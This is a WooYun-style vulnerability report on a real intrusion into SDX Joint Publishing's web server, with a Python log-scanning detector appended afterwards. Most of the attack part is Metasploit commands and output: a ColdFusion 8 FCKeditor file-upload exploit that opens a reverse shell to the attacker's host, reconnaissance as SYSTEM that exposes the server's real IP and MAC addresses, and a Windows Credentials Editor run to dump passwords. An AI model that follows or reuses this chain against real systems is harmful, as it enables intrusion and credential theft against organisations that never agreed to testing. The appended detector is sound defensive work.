
Defect ID: wooyun-2015-093090

Title: Successful intrusion of 三联书店 (SDX Joint Publishing Company)

Related vendor: 北京云因信息技术有限公司

Author: 路人甲

Submitted: 2015-01-21 19:08

Fixed: 2015-03-07 19:10

Published: 2015-03-07 19:10

Vulnerability type: Successful intrusion event

Severity: High

Self-assessed rank: 20

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-01-21: Vendor contacted and awaiting the vendor's acknowledgement; details withheld from the public
2015-03-07: Vendor has actively ignored the vulnerability; details disclosed to the public

Summary:

Successful intrusion of 三联书店 (www.sdxjpc.com)

Detailed description:

1# Directory scanning found the FCKeditor path

http://www.sdxjpc.com/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm


2# Searching for coldfusion in msf turned up the matching FCKeditor exploit module

msf > search coldfusion
exploit/windows/http/coldfusion_fckeditor 2009-07-03 excellent ColdFusion 8.0.1 Arbitrary File Upload and Execute


Set the relevant parameters

msf > use exploit/windows/http/coldfusion_fckeditor
msf exploit(coldfusion_fckeditor) > set RHOST www.sdxjpc.com
msf exploit(coldfusion_fckeditor) > set payload generic/shell_reverse_tcp
msf exploit(coldfusion_fckeditor) > set LHOST XX.XX.XX.XX
msf exploit(coldfusion_fckeditor) > set LPORT 8888


Run the payload
msf exploit(coldfusion_fckeditor) > run
[*] Started reverse handler on XX.XX.XX.XX:8888
[*] Sending our POST request...
[*] Upload succeeded! Executing payload...
[*] Command shell session 2 opened (XX.XX.XX.XX:8888 -> 119.40.39.235:4975) at 2015-01-21 10:56:39 +0800
Microsoft Windows XP [版本 5.2.3790]
(C) 版权所有 1985-2001 Microsoft Corp.
d:\ColdFusion8\runtime\bin>ver
ver
Microsoft Windows XP [版本 5.2.3790]

Run other commands

d:\ColdFusion8\runtime\bin>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : sdxjpc
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : BCM5703 Gigabit Ethernet
Physical Address. . . . . . . . . : 00-0E-7F-AF-2F-C2
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 119.40.39.235
Subnet Mask . . . . . . . . . . . : 255.255.255.248
Default Gateway . . . . . . . . . : 119.40.39.233
DNS Servers . . . . . . . . . . . : 202.106.0.20
202.106.196.115
d:\ColdFusion8\runtime\bin>whoami
whoami
nt authority\system
d:\ColdFusion8\runtime\bin>netstat -an


Dump password hashes

C:\>wce.txt -l
wce.txt -l
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
C:\>wce.txt -w
wce.txt -w
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.


Proof of vulnerability:

1.jpg


2.jpg


Remediation:

Restrict permissions on the FCK editor so that its file-manager upload connector is not publicly reachable.
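A detection that complements that fix, as an added example that is not part of the original report: it scans web-server access-log lines for requests to the FCKeditor file-manager tree under /CFIDE (the path abused above) and separates successful uploads from mere probes. The IIS W3C field order used here and all log lines are constructed assumptions.

```python
# Added example (not from the original report): flag access-log entries that
# touch the FCKeditor file-manager connectors under /CFIDE, the path abused in
# this report. Log lines and their field order are constructed for the example.
import re
from dataclasses import dataclass

# Connector tree of the FCKeditor copy that ships with ColdFusion 8 (path from the report).
FCK_CONNECTOR_RE = re.compile(
    r"/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/", re.IGNORECASE
)
# Connector files that accept file content (upload.cfm is the one seen in the report).
UPLOAD_ENDPOINT_RE = re.compile(r"/(upload|connector)\.cfm$", re.IGNORECASE)


@dataclass
class Hit:
    client: str
    method: str
    path: str
    status: int
    severity: str  # "upload": a POST to an upload connector answered 200; else "probe"


# Constructed IIS W3C-style lines: date time c-ip cs-method cs-uri-stem sc-status
SAMPLE_LOG = """\
2015-01-21 10:55:01 203.0.113.9 GET /index.cfm 200
2015-01-21 10:55:30 203.0.113.9 GET /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm 200
2015-01-21 10:56:39 203.0.113.9 POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm 200
2015-01-21 10:57:02 198.51.100.7 POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm 403
2015-01-21 10:58:10 203.0.113.9 GET /images/logo.png 200
"""


def scan_log(text: str) -> list[Hit]:
    """Return one Hit per request that reaches the FCKeditor file-manager tree."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue  # malformed or truncated line; skip rather than guess
        client, method, path, status = fields[2], fields[3], fields[4], int(fields[5])
        if not FCK_CONNECTOR_RE.search(path):
            continue
        uploaded = (method == "POST" and status == 200
                    and UPLOAD_ENDPOINT_RE.search(path) is not None)
        hits.append(Hit(client, method, path, status, "upload" if uploaded else "probe"))
    return hits


def clients_with_successful_upload(hits: list[Hit]) -> set[str]:
    """Source addresses whose POST to an upload connector was answered 200 (a 403 is a blocked probe)."""
    return {h.client for h in hits if h.severity == "upload"}
```

A 403 on the same endpoint, as in the fourth constructed line, is what a correctly restricted connector should return; it is reported as a probe, not an upload.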

Copyright notice: when reposting, please credit the source, 路人甲@乌云


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused